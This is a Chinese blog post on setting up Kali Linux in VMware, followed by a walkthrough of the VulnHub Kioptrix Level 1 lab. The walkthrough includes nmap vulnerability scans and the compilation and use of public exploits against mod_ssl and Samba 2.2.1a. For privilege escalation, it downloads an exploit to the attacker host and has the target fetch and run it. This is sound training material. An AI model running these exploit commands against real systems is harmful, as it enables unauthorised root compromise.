VMware是一家领先的虚拟化和云计算技术公司，专注于提供企业级解决方案。其核心产品包括虚拟化平台、云管理和自动化工具，旨在帮助企业优化IT基础设施，提升运维效率。VMware的技术广泛应用于数据中心、桌面虚拟化、网络安全和应用开发等领域，推动了云计算、容器化和企业数字化转型的进程。

VMware 官网下载：https://www.vmware.com/products/desktop-hypervisor/workstation-and-fusion

下载安装后，激活网上找教程激活即可。2024年5月后Workstation 和 Fusion 对个人使用完全免费，企业许可转向订阅，个人用户也可以使用免费版。关注公众号泷羽Sec-静安，后台回复找工具+Day2获取镜像和相关软件。

镜像启动

在Vmware中点击打开虚拟机，选择下载好的kali镜像（解压一下），选择文件夹下的.vmx文件即可。点击启动即可。

1默认用户名：kali
2默认密码：kali

可以通过passwd命令修改账户密码，但是学习阶段不建议，就一个虚拟机，省得后面复杂操作的时候记不得。

常用网站链接

kali全套官方工具包详解 https://www.kali.org/tools/all-tools/

kali 官方文档手册 https://www.kali.org/docs/

kali官方论坛 https://forums.kali.org/官方建议，发帖之前先阅读论坛规则和向导，不合规的帖子可能被忽略

kali bug自助页面 https://bugs.kali.org

官方kali解密书籍：《Kali Linux Revealed: mastering the penetration testing distribution》关注公众号泷羽Sec-静安后台回复找书+KLR获取下载链接

kali换源和新装机设置

1sudo -s
2vim /etc/apt/sources.list

1# 清华大学Kali镜像源
2 
3deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free non-free-firmware
4deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free non-free-firmware

复制上面的内容，按I键进入插入模式，插入到list文件中，注释原来的kali官方源，按ESC退出编辑模式，然后按:wq保存并退出。更多详细vim命令请参考菜鸟 Linux vi/vim，vimtutor和vim官方，或在终端输入vimtutor查看官方指南。

然后在终端中更新镜像源并升级软件包。注意看源是否已经换成清华源。若你的网络对于清华源还是慢，可以参考Kali 2024更换源（超详细，附国内优质镜像源地址）_kali换源选择其他源。更新升级会占用大量时间，但这是必须的。

1apt update
2apt upgrade

安装或更新完成后，会遗留一些软件的安装包，会占用部分硬盘空间，可使用下面的命令来对其进行清理

1apt-get clean

设置锁屏时间为从不

不然经常切换应用后要输入kali:kali登录。左键点击电池图标，选择设置，找到安全性，设置锁屏时间为从不（never）

配置ssh服务

输入命令：vim /etc/ssh/sshd_config 将下面的命令改为yes

1PasswordAuthentication yes 密码验证改为yes

输入命令：service ssh start 开启ssh服务输入命令：update-rc.d ssh enable 设置为开机自启动不要忘记 reboot （重启kali虚拟机）

这样你就可以在虚拟机以外利用shell软件进行远程的访问。方便复制粘贴一些命令，有时候在kali中复制粘贴会有问题，然后就是截屏不方便。

我个人是喜欢使用MobaXterm来作为我的shell而不是默认终端。关注公众号泷羽Sec-静安，后台回复找工具+Day2获取镜像和相关软件。先在原本的kali中输入ifconfig查看kali的网段，然后从mobaXterm中连接ssh登录kali即可。

汉化

我的建议是没有必要汉化，因为目前很多OSCP的资料还是英文的比较权威，汉化后不一定能一步一步找着英文教材对应的软件名字，还有一些细节的按钮。但是如果你实在觉得看着英文难受，觉得中文界面学习更方便的话，可以使用dpkg-reconfigure locales命令选择按照汉化，然后重启，重启后会有提示框询问是否修改文件夹语言，记得一定要选择否，保留旧的英文名称，因为有一些安全工具，不支持中文路径，与其后期麻烦的改来改去纠结路径问题，不如全部保留英文路径。也建议在之后的学习中，保持起英文文件夹名字的习惯，用英文也好用拼音也好，总之要是英文字母的文件名。

至此，一个基本的好用的Kali已经设置完毕，可以开始靶机练习了。

Kioptix Level 1 练习

https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

Nmap扫描

输入ifconfig查看kali本机的网段。

输入 nmap -sn kali的ip/24探查网段，实战过程是通过vpn链接，进去后能查看网段。或 nmap -p- kali的ip/24探查所有网段。

可以发现129有一个80端口，在kali浏览器中访问可以看到如下界面：

接下来探查端口指纹

1 nmap 192.168.139.129 -p 22,80,111,139,443,1024 -sV -sC -O --version-al

然后用漏洞扫描

1nmap 192.168.139.129 -p 22,80,111,139,443,1024 --script=vuln

得到输出

 1┌──(kali㉿kali)-[~]
 2└─$ nmap 192.168.139.129 -p 22,80,111,139,443,1024 --script=vuln
 3Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-22 22:14 EST
 4Stats: 0:00:06 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
 5NSE Timing: About 0.00% done
 6Nmap scan report for 192.168.139.129
 7Host is up (0.00025s latency).
 8
 9PORT STATE SERVICE
 1022/tcp open ssh
 1180/tcp open http
 12|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
 13|_http-csrf: Couldn't find any CSRF vulnerabilities.
 14|_http-dombased-xss: Couldn't find any DOM based XSS.
 15|_http-trace: TRACE is enabled
 16| http-enum:
 17| /test.php: Test page
 18| /icons/: Potentially interesting directory w/ listing on 'apache/1.3.20'
 19| /manual/: Potentially interesting directory w/ listing on 'apache/1.3.20'
 20|_ /usage/: Potentially interesting folder
 21111/tcp open rpcbind
 22139/tcp open netbios-ssn
 23443/tcp open https
 24|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
 25| ssl-poodle:
 26| VULNERABLE:
 27| SSL POODLE information leak
 28| State: VULNERABLE
 29| IDs: CVE:CVE-2014-3566 BID:70574
 30| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
 31| products, uses nondeterministic CBC padding, which makes it easier
 32| for man-in-the-middle attackers to obtain cleartext data via a
 33| padding-oracle attack, aka the "POODLE" issue.
 34| Disclosure date: 2014-10-14
 35| Check results:
 36| TLS_RSA_WITH_3DES_EDE_CBC_SHA
 37| References:
 38| https://www.imperialviolet.org/2014/10/14/poodle.html
 39| https://www.openssl.org/~bodo/ssl-poodle.pdf
 40| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
 41|_ https://www.securityfocus.com/bid/70574
 42|_http-csrf: Couldn't find any CSRF vulnerabilities.
 43| ssl-dh-params:
 44| VULNERABLE:
 45| Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
 46| State: VULNERABLE
 47| IDs: CVE:CVE-2015-4000 BID:74733
 48| The Transport Layer Security (TLS) protocol contains a flaw that is
 49| triggered when handling Diffie-Hellman key exchanges defined with
 50| the DHE_EXPORT cipher. This may allow a man-in-the-middle attacker
 51| to downgrade the security of a TLS session to 512-bit export-grade
 52| cryptography, which is significantly weaker, allowing the attacker
 53| to more easily break the encryption and monitor or tamper with
 54| the encrypted stream.
 55| Disclosure date: 2015-5-19
 56| Check results:
 57| EXPORT-GRADE DH GROUP 1
 58| Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
 59| Modulus Type: Safe prime
 60| Modulus Source: mod_ssl 2.0.x/512-bit MODP group with safe prime modulus
 61| Modulus Length: 512
 62| Generator Length: 8
 63| Public Key Length: 512
 64| References:
 65| https://www.securityfocus.com/bid/74733
 66| https://weakdh.org
 67| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000
 68|
 69| Diffie-Hellman Key Exchange Insufficient Group Strength
 70| State: VULNERABLE
 71| Transport Layer Security (TLS) services that use Diffie-Hellman groups
 72| of insufficient strength, especially those using one of a few commonly
 73| shared groups, may be susceptible to passive eavesdropping attacks.
 74| Check results:
 75| WEAK DH GROUP 1
 76| Cipher Suite: TLS_DHE_RSA_WITH_DES_CBC_SHA
 77| Modulus Type: Safe prime
 78| Modulus Source: mod_ssl 2.0.x/1024-bit MODP group with safe prime modulus
 79| Modulus Length: 1024
 80| Generator Length: 8
 81| Public Key Length: 1024
 82| References:
 83|_ https://weakdh.org
 84|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
 85| ssl-ccs-injection:
 86| VULNERABLE:
 87| SSL/TLS MITM vulnerability (CCS Injection)
 88| State: VULNERABLE
 89| Risk factor: High
 90| OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
 91| does not properly restrict processing of ChangeCipherSpec messages,
 92| which allows man-in-the-middle attackers to trigger use of a zero
 93| length master key in certain OpenSSL-to-OpenSSL communications, and
 94| consequently hijack sessions or obtain sensitive information, via
 95| a crafted TLS handshake, aka the "CCS Injection" vulnerability.
 96|
 97| References:
 98| http://www.cvedetails.com/cve/2014-0224
 99| http://www.openssl.org/news/secadv_20140605.txt
100|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
101|_http-dombased-xss: Couldn't find any DOM based XSS.
102|_sslv2-drown: ERROR: Script execution failed (use -d to debug)
1031024/tcp open kdm
104MAC Address: 00:0C:29:3B:F8:BB (VMware)
105
106Host script results:
107|_smb-vuln-ms10-054: false
108| smb-vuln-cve2009-3103:
109| VULNERABLE:
110| SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
111| State: VULNERABLE
112| IDs: CVE:CVE-2009-3103
113| Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
114| Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
115| denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
116| PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
117| aka "SMBv2 Negotiation Vulnerability."
118|
119| Disclosure date: 2009-09-08
120| References:
121| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
122|_ http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
123|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [14]
124|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [14]
125
126Nmap done: 1 IP address (1 host up) scanned in 333.53 seconds

目录扫描

从Nmap扫描的结果来看，它提示以下几个文件目录，可能有洞。

使用如下命令扫描目录

1dirb http://192.168.139.129/

看一圈泄露的目录后发现mod_ssl目录下似乎提示此漏洞可利用（靶机会这样提示，实战要自己猜自己挖）。且从之前的Nmap扫描结果中看出，SSL存在漏洞。

SSL漏洞利用 80/443端口

Kali终端中输入以下命令，查找可用的攻击方式。

1searchsploit mod_ssl

根据之前Nmap扫描的版本信息选择对应的攻击方式。可用的几个方式都试一遍。下载攻击方式，如果下载文件有损坏，可以到 https://www.exploit-db.com/ 网站下载对应源码。

1searchsploit -m 47080.c
2sudo apt-get install libssl-dev # 安装依赖环境
3gcc -o ssl47080 47080.c -lcrypto # 编译源码

1 ./ssl47080 |grep "1.3.20"

筛选符合 Apache 1.3.20版本的工具

靶机系统是RedHat，所以使用0x6a或0x6b。

0x6a测试失败，改用0x6b，输入以下命令：

1./ssl47080 0x6b 192.168.139.129 -c 40

提权为root

目前是使用apache账户登录shell，这个账户是用于apache服务的专用账户，可以使用ls /bin查看目前账户可以使用的命令，可以发现只能使用一些基本命令，权限较低，我们想要完整的shell就要root账户，就要提权。

现在本地攻击机下面下载提权脚本。

1wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

然后开启一个简单的http服务，提供给靶机用于下载提权脚本。

1sudo python -m http.server 80

这个靶机好在可以使用wget命令下载提权脚本。如果wget用不了的情况，可以尝试用curl或ftp下载脚本。然后从之前47080进去的Apache账户的shell里运行以下命令：

1wget http://192.168.139.128/ptrace-kmod.c

退出，然后再次重连，自动编译，就会获得root权限。如果重连后不是root，可以多试几次，或者更换47080.c文件。

另一种提权的方式：

（CVE-2003-0651）Apache RCE

https://www.cnblogs.com/wsec/p/vulnhub0x01.html#3cve-2003-0651apache-rce

这个67.c文件最好从网站下载，kali里下载的不全。尾号305的才是正确的文件。

但是编译不出来。

Samba 漏洞利用139端口

https://medium.com/@MarkdeMoras/kioptrix-level-1-1-vulnhub-walkthrough-by-mark-de-moras-147002cc4853

除了ssl漏洞，可以从之前的Nmap扫描结果发现也存在Samba漏洞。

使用Nmap再次扫描靶机的网址。

1 nmap -A -p- -T4 192.168.139.129

使用msf工具箱

1msfconsole
2search scanner/smb
3use 16
4info
5set RHOST 192.168.139.129

这样就获取了samba的版本，退出msf，然后搜索samba的攻击方式，选择对应版本。下载，编译。

1searchsploit samba 2.2.1a
2searchsploit -m multiple/remote/10.c
3gcc -o Samba 10.c

查看使用方式

使用如下命令爆破进入，直接获得root权限。

1./Samba -b 0 192.168.139.129

Samba缓存漏洞利用139端口

搜索通用版本的samba攻击方式，发现，还有例如“call_trans2open”远程缓冲区溢出（2）漏洞利用的方式。下载编译后查看使用方式。

rpcbind 尝试

漏洞扫描的结果中还有111端口和1024端口的rpcbind服务，搜索了有如下方法，但是尝试失败。

https://www.cnblogs.com/KUANTECH/p/17941528

上面这篇文章也做过了尝试是失败的，所以rpc的漏洞就不尝试了。

总结

找漏洞渗透的步骤：

Nmap 扫可能的漏洞和端口

1nmap -sn kali的ip/24
2nmap 192.168.139.129 -p 22,80,111,139,443,1024 -sV -sC -O --version-al
3nmap 192.168.139.129 -p 22,80,111,139,443,1024 --script=vuln

dirb扫目录
观察可能的端口和应用

searchsploit 和msf搜索可用的攻击载荷

1searchsploit xxx
2searchsploit -m 67.c
3---
4msfconsole
5search xxx
6use 编号
7info
8set Rhost 192.168.139.129
9run

根据版本选择poc，编译，调试，打！

关注公众号泷羽Sec-静安，后台回复找工具+Day2获取镜像和相关软件及POC。

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

工具 on 静静的安全笔记

Day23 Kali网络应用程序攻击

🔍 Web应用漏洞特性

🚀 渗透测试四步方法论

1. 信息收集核心技巧

⚠️ 技术要点

1. 响应头情报价值

2. 源码分析三板斧

3. 后台路径字典

实战案例

网站基本信息

Burp抓包请求头和响应头分析

​一、HTTP 请求头关键字段解析​

​​二、HTTP 响应头关键字段解析​​

​​三、渗透测试中的关键关注点​​

Day22 Kali漏洞扫描

漏洞扫描：安全评估的自动化基石

漏洞扫描核心总结

1. 手动扫描与自动扫描的辩证关系

2. 互联网扫描 vs. 内网扫描的关键差异

3. 认证扫描 vs. 非认证扫描的深度对比

🛠️ Nessus安装和使用

扫描核心操作流程

1. 新建扫描

2. 目标配置

3. 认证扫描配置

4. 单插件扫描

5. 结果分析

操作避坑指南

🔍 Nmap漏洞扫描深度解析

🖥️ 关键操作命令：

⚙️ 脚本管理技巧：

🛡️ GVM（Greenbone漏洞管理器）部署指南

⚡ 快速部署命令（Kali Linux）：

🖥️ 常用操作：

🌐 基础使用流程：

🔍 AWVS 安装使用

🔑 核心特性：

📥 安装指南（Kali Linux）

⚠️ 前提条件：

🛠️ 安装步骤：

🚀 基础使用教程

1. 创建扫描任务

2. 扫描结果分析

3. 高级功能

⚠️ 避坑指南

相似功能新产品推荐

⚖️ 商业 vs 开源核心差异分析

🏭 商业工具依赖维度

🌐 开源工具生存逻辑

📊 关键能力对比

🛡️ 中国网络安全市场主流产品图谱

🆚 国产 VS 国际产品关键差异

🚀 免费替代方案推荐

【踩坑总结】丝滑连接OffSec官方VPN的方法

方法一：物理机登机场开Tun模式，Kali虚拟机连接靶机VPN

方法二：物理机登机场允许局域网连接，修改universal.ovpn开头

方法三：Kali中用V2rayN命令行连接，Kali直连Vpn

命令参数之间的配合

自动MTU测试脚本

Nmap 最佳参数确定

Day19 Kali主动扫描SMB、NetBIOS、SMTP、SNMP

Nmap核心扫描流程与命令回顾

端口服务探测方法的比较与考试建议

重要原则与警示

核心结论（针对考试）

SMB枚举

NetBIOS服务

一、核心协议与端口

二、扫描场景与工具

1. 端口扫描（nmap）

2. NetBIOS 名称枚举（nbtscan）

三、安全实践与注意事项

四、技术逻辑图

练习 7.3.2.1

1. 识别运行 Windows 的 SMB 服务器

2. 扫描 SMB 漏洞（NSE 脚本）

3. 跨版本 Windows 数据枚举分析

nbtscan（获取 NetBIOS 信息）

enum4linux（深度枚举）

一、HTTP 请求头关键字段解析

二、HTTP 响应头关键字段解析

三、渗透测试中的关键关注点